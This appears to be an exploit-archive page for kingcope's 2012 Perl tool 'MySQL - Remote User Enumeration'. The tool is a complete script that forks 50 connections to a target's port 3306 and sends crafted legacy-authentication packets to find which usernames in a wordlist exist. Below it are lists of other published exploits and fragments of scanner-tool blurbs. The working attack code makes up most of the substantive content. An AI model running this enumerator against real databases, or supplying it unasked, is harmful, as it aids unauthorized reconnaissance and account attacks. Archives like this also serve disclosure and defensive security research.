Menu

Search for hundreds of thousands of exploits

"MySQL - Remote User Enumeration"

Author

Exploit author

kingcope

Platform

Exploit platform

multiple

Release date

Exploit published date

2012-12-02

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# MySQL User Account Enumeration Utility
# When an attacker authenticates using an incorrect password
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server
# the mysql server will respond with a different message than Access Denied, what makes
# User Account Enumeration possible.
# The Downside is that the attacker has to reconnect for each user enumeration attempt
#20000 user accounts in 7 minutes
#Mon Jan 16 09:00:18 UTC 2012
#Mon Jan 16 09:07:26 UTC 2012
#root@vs2067037:~# wc -l MEDIUM.LST
#21109 MEDIUM.LST
#A usernames.txt wordlist is included in this package
#examples:
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: administrator@host
#
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: admin@host
#

use IO::Socket;
use Parallel::ForkManager;
$|=1;

if ($#ARGV != 1) {
print "Usage: mysqlenumerate.pl <target> <wordlist>\n";
exit;
}

$target = $ARGV[0];
$wordlist = $ARGV[1];
$numforks = 50;
$pm = new Parallel::ForkManager($numforks);

open FILE,"<$wordlist";
unlink '/tmp/cracked';

@users = ();
$k=0;
while(<FILE>) {
        chomp;
        $_ =~ s/\r//g;
        $users[$k++] = $_;
}
close FILE;
$k2 = 0;
for(;;) {
for ($k=0;$k<$numforks;$k++) {
$k2++;
if (($k2 > $#users) or (-e '/tmp/cracked')) {
exit;
}
my $pid = $pm->start and next;
$user = $users[$k2];
goto further;
again:
print "Connect Error\n";
further:
my $sock = IO::Socket::INET->new(PeerAddr => $target,
                              PeerPort => '3306',
                              Proto    => 'tcp') || goto again;
recv($sock, $buff, 1024, 0);

$buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50".
                        "\x4e\x5f\x51\x55\x45\x4d\x45\x00";
$buf = chr(length($buf)-3). $buf;
print $sock $buf;
$res = recv($sock, $buff, 1024, 0);
close($sock);
if ($k2 % 100 == 0) {
print $buff."\n";
}
if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}
unless (-e '/tmp/cracked') {
open FILE, ">/tmp/cracked";
close FILE;
print "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
open FILE, ">jackpot";
print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
exit;
}
}
$pm->wait_all_children;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2013-10-29 "Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution" remote php kingcope
2013-09-03 "MikroTik RouterOS - sshd (ROSSSH) Remote Heap Corruption" remote hardware kingcope
2013-08-07 "Apache suEXEC - Information Disclosure / Privilege Escalation" remote linux kingcope
2013-07-16 "Squid 3.3.5 - Denial of Service (PoC)" dos linux kingcope
2013-07-11 "Nginx 1.3.9/1.4.0 (x86) - Brute Force" remote linux_x86 kingcope
2013-06-05 "Plesk < 9.5.4 - Remote Command Execution" remote php kingcope
2013-04-12 "ircd-hybrid 8.0.5 - Denial of Service" dos linux kingcope
2012-12-06 "Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass" remote linux kingcope
2012-12-02 "MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution" remote windows kingcope
2012-12-02 "MySQL (Linux) - Heap Overrun (PoC)" dos linux kingcope
2012-12-02 "IBM System Director Agent - Remote System Level" remote windows kingcope
2012-12-02 "freeFTPd 1.2.6 - Remote Authentication Bypass" remote windows kingcope
2012-12-02 "MySQL - Denial of Service (PoC)" dos linux kingcope
2012-12-02 "MySQL (Linux) - Stack Buffer Overrun (PoC)" dos linux kingcope
2012-12-02 "MySQL (Linux) - Database Privilege Escalation" local linux kingcope
2012-12-02 "(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Remote Authentication Bypass" remote linux kingcope
2012-12-02 "MySQL - 'Stuxnet Technique' Windows Remote System" remote windows kingcope
2012-12-02 "freeSSHd 2.1.3 - Remote Authentication Bypass" remote windows kingcope
2012-12-02 "MySQL - Remote User Enumeration" remote multiple kingcope
2012-08-13 "Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)" dos linux kingcope
2012-07-01 "BSD - 'TelnetD' Remote Command Execution (2)" remote bsd kingcope
2012-06-10 "Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities" remote windows kingcope
2012-03-19 "Apache Tomcat - Account Scanner / 'PUT' Request Command Execution" remote multiple kingcope
2012-01-17 "Linux Kernel 2.6.36 IGMP - Remote Denial of Service" dos linux kingcope
2011-12-01 "FreeBSD - 'ftpd / ProFTPd' Remote Command Execution" remote freebsd kingcope
2011-12-01 "Serv-U FTP Server - Jail Break" remote windows kingcope
2011-10-11 "JBoss AS 2.0 - Remote Command Execution" remote windows kingcope
2011-08-19 "Apache - Remote Memory Exhaustion (Denial of Service)" dos multiple kingcope
2011-06-30 "FreeBSD OpenSSH 3.5p1 - Remote Command Execution" remote freebsd kingcope
2011-03-04 "JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution" webapps jsp kingcope 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected